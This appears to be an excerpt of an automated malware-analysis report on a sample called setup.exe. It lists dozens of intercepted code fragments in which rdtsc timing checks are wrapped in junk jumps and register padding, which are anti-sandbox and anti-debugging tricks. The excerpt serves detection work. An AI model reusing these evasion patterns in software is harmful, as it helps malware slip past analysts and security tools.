Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E0F32 second address: 48E0F91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FBA2516CD50h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 call 00007FBA2516CD4Ch 0x00000018 pop esi 0x00000019 pushfd 0x0000001a jmp 00007FBA2516CD4Bh 0x0000001f and ecx, 5FE9E6BEh 0x00000025 jmp 00007FBA2516CD59h 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E0F91 second address: 48E0FB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov bx, si 0x0000000e push eax 0x0000000f mov ch, bl 0x00000011 pop eax 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E0FB8 second address: 48E0FBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E0FBC second address: 48E0FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4880132 second address: 48801B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FBA2516CD4Eh 0x00000010 push dword ptr [ebp+04h] 0x00000013 pushad 0x00000014 pushad 0x00000015 jmp 00007FBA2516CD4Ch 0x0000001a movzx eax, di 0x0000001d popad 0x0000001e pushfd 0x0000001f jmp 00007FBA2516CD57h 0x00000024 jmp 00007FBA2516CD53h 0x00000029 popfd 0x0000002a popad 0x0000002b push dword ptr [ebp+0Ch] 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FBA2516CD52h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48A0893 second address: 48A0898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48A0898 second address: 48A089E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48A089E second address: 48A08A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48A08A2 second address: 48A090B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d jmp 00007FBA2516CD4Ch 0x00000012 pushfd 0x00000013 jmp 00007FBA2516CD52h 0x00000018 add cx, 2F38h 0x0000001d jmp 00007FBA2516CD4Bh 0x00000022 popfd 0x00000023 popad 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FBA2516CD54h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48A090B second address: 48A091D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA24820D9Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48A091D second address: 48A096B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov cl, EFh 0x0000000f pushfd 0x00000010 jmp 00007FBA2516CD51h 0x00000015 add al, FFFFFFE6h 0x00000018 jmp 00007FBA2516CD51h 0x0000001d popfd 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FBA2516CD4Dh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48A096B second address: 48A0992 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 mov si, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBA24820DA7h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48A0992 second address: 48A0996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48A0996 second address: 48A099C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48A076C second address: 48A077C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA2516CD4Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48A077C second address: 48A0797 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820D9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edi, eax 0x00000011 mov di, cx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48A0797 second address: 48A07C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBA2516CD55h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48A07C6 second address: 48A07CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48A07CC second address: 48A07D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48A07D0 second address: 48A07D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48A07D4 second address: 48A0805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov si, B737h 0x00000011 pushfd 0x00000012 jmp 00007FBA2516CD4Ch 0x00000017 xor esi, 30505828h 0x0000001d jmp 00007FBA2516CD4Bh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48A0805 second address: 48A0832 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBA24820D9Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48A04FB second address: 48A0513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA2516CD54h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48A0513 second address: 48A0543 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b movsx ebx, cx 0x0000000e push esi 0x0000000f push edx 0x00000010 pop esi 0x00000011 pop ebx 0x00000012 popad 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov si, dx 0x0000001a jmp 00007FBA24820DA5h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48B03EF second address: 48B0472 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBA2516CD4Fh 0x00000009 or cl, FFFFFFEEh 0x0000000c jmp 00007FBA2516CD59h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007FBA2516CD50h 0x00000018 jmp 00007FBA2516CD55h 0x0000001d popfd 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 push eax 0x00000022 pushad 0x00000023 mov bl, 8Ch 0x00000025 jmp 00007FBA2516CD58h 0x0000002a popad 0x0000002b xchg eax, ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov edx, 21573510h 0x00000034 mov bh, 92h 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E0E6F second address: 48E0E8A instructions: 0x00000000 rdtsc 0x00000002 mov esi, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 jmp 00007FBA24820D9Ah 0x0000000d mov dword ptr [esp], ebp 0x00000010 pushad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E0E8A second address: 48E0E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 mov ebx, 2ECC9C8Ah 0x0000000b pop edx 0x0000000c popad 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E0E9F second address: 48E0EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E0EA3 second address: 48E0EB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E0EB6 second address: 48E0EBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48C04AF second address: 48C0501 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 79020C34h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov di, cx 0x00000010 mov bh, cl 0x00000012 popad 0x00000013 mov dword ptr [esp], ebp 0x00000016 pushad 0x00000017 mov bh, 13h 0x00000019 pushfd 0x0000001a jmp 00007FBA2516CD54h 0x0000001f add ax, 1518h 0x00000024 jmp 00007FBA2516CD4Bh 0x00000029 popfd 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d pushad 0x0000002e mov ebx, ecx 0x00000030 mov di, ax 0x00000033 popad 0x00000034 mov eax, dword ptr [ebp+08h] 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48C0501 second address: 48C0505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48C0505 second address: 48C050B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48C050B second address: 48C0565 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, ax 0x00000006 movzx esi, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c and dword ptr [eax], 00000000h 0x0000000f pushad 0x00000010 mov bx, 1554h 0x00000014 push ebx 0x00000015 pushfd 0x00000016 jmp 00007FBA24820DA8h 0x0000001b add esi, 630C2908h 0x00000021 jmp 00007FBA24820D9Bh 0x00000026 popfd 0x00000027 pop eax 0x00000028 popad 0x00000029 and dword ptr [eax+04h], 00000000h 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FBA24820DA2h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48A0672 second address: 48A0681 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48A0681 second address: 48A0702 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 mov ecx, edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FBA24820D9Ah 0x00000012 sub si, 02C8h 0x00000017 jmp 00007FBA24820D9Bh 0x0000001c popfd 0x0000001d push ecx 0x0000001e pop eax 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 pushad 0x00000022 jmp 00007FBA24820DA7h 0x00000027 mov ebx, esi 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c pushad 0x0000002d mov ebx, eax 0x0000002f pushfd 0x00000030 jmp 00007FBA24820D9Ch 0x00000035 adc eax, 5678B788h 0x0000003b jmp 00007FBA24820D9Bh 0x00000040 popfd 0x00000041 popad 0x00000042 pop ebp 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FBA24820DA0h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48A0702 second address: 48A0706 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48A0706 second address: 48A070C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48C001B second address: 48C0022 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48C0022 second address: 48C0083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 jmp 00007FBA24820D9Ch 0x0000000d mov dword ptr [esp], ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FBA24820D9Eh 0x00000017 sub eax, 03544DD8h 0x0000001d jmp 00007FBA24820D9Bh 0x00000022 popfd 0x00000023 push eax 0x00000024 push edx 0x00000025 pushfd 0x00000026 jmp 00007FBA24820DA6h 0x0000002b sub al, 00000038h 0x0000002e jmp 00007FBA24820D9Bh 0x00000033 popfd 0x00000034 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48C0083 second address: 48C00D1 instructions: 0x00000000 rdtsc 0x00000002 call 00007FBA2516CD58h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d jmp 00007FBA2516CD51h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FBA2516CD58h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48C00D1 second address: 48C00E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820D9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48C00E0 second address: 48C00E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48C00E6 second address: 48C00EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48C038C second address: 48C03CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FBA2516CD4Bh 0x0000000b jmp 00007FBA2516CD53h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FBA2516CD55h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E0666 second address: 48E066C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E066C second address: 48E0670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E0670 second address: 48E0674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E0674 second address: 48E06F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FBA2516CD4Eh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FBA2516CD4Eh 0x00000016 adc si, B478h 0x0000001b jmp 00007FBA2516CD4Bh 0x00000020 popfd 0x00000021 jmp 00007FBA2516CD58h 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 jmp 00007FBA2516CD50h 0x0000002e xchg eax, ecx 0x0000002f pushad 0x00000030 pushad 0x00000031 mov edi, eax 0x00000033 mov cx, 9C7Fh 0x00000037 popad 0x00000038 mov cl, 81h 0x0000003a popad 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FBA2516CD4Dh 0x00000043 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E06F5 second address: 48E075F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FBA24820DA7h 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007FBA24820DA9h 0x0000000f sbb ecx, 716CB136h 0x00000015 jmp 00007FBA24820DA1h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e xchg eax, ecx 0x0000001f jmp 00007FBA24820D9Eh 0x00000024 mov eax, dword ptr [76FA65FCh] 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E075F second address: 48E0763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E0763 second address: 48E0769 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E0769 second address: 48E0778 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA2516CD4Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E0778 second address: 48E077C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E077C second address: 48E07B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a pushad 0x0000000b mov cx, bx 0x0000000e mov ah, bl 0x00000010 popad 0x00000011 je 00007FBA977AFF1Fh 0x00000017 jmp 00007FBA2516CD56h 0x0000001c mov ecx, eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FBA2516CD4Ah 0x00000027 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E07B9 second address: 48E07BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E07BF second address: 48E07DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edi, ecx 0x00000011 movzx eax, bx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E07DD second address: 48E07E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E07E3 second address: 48E07E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E07E7 second address: 48E082D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and ecx, 1Fh 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007FBA24820DA2h 0x00000012 mov eax, 240E40A1h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushfd 0x0000001b jmp 00007FBA24820D9Ch 0x00000020 or ecx, 33D9AC38h 0x00000026 jmp 00007FBA24820D9Bh 0x0000002b popfd 0x0000002c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E082D second address: 48E0846 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 ror eax, cl 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBA2516CD4Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E0846 second address: 48E084A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E084A second address: 48E0850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E0850 second address: 48E0891 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820D9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a jmp 00007FBA24820DA0h 0x0000000f retn 0004h 0x00000012 nop 0x00000013 mov esi, eax 0x00000015 lea eax, dword ptr [ebp-08h] 0x00000018 xor esi, dword ptr [007C2014h] 0x0000001e push eax 0x0000001f push eax 0x00000020 push eax 0x00000021 lea eax, dword ptr [ebp-10h] 0x00000024 push eax 0x00000025 call 00007FBA2898161Ch 0x0000002a push FFFFFFFEh 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FBA24820DA7h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E0891 second address: 48E08AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 mov bh, 4Dh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b jmp 00007FBA2516CD4Ah 0x00000010 ret 0x00000011 nop 0x00000012 push eax 0x00000013 call 00007FBA292CD5F6h 0x00000018 mov edi, edi 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E08AE second address: 48E08C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FBA24820DA3h 0x00000009 pop ecx 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E08C7 second address: 48E08D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov bl, ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E08D7 second address: 48E0924 instructions: 0x00000000 rdtsc 0x00000002 mov si, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 mov edx, esi 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007FBA24820DA4h 0x00000012 xchg eax, ebp 0x00000013 jmp 00007FBA24820DA0h 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FBA24820DA7h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E0924 second address: 48E092A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4890008 second address: 489000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 489000C second address: 4890010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4890010 second address: 4890016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4890016 second address: 489008C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FBA2516CD4Ch 0x00000012 jmp 00007FBA2516CD55h 0x00000017 popfd 0x00000018 mov ah, 0Ah 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushfd 0x0000001e jmp 00007FBA2516CD53h 0x00000023 adc ax, 832Eh 0x00000028 jmp 00007FBA2516CD59h 0x0000002d popfd 0x0000002e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 489008C second address: 489009D instructions: 0x00000000 rdtsc 0x00000002 mov ebx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov di, cx 0x0000000e mov ch, 5Fh 0x00000010 popad 0x00000011 rdtsc
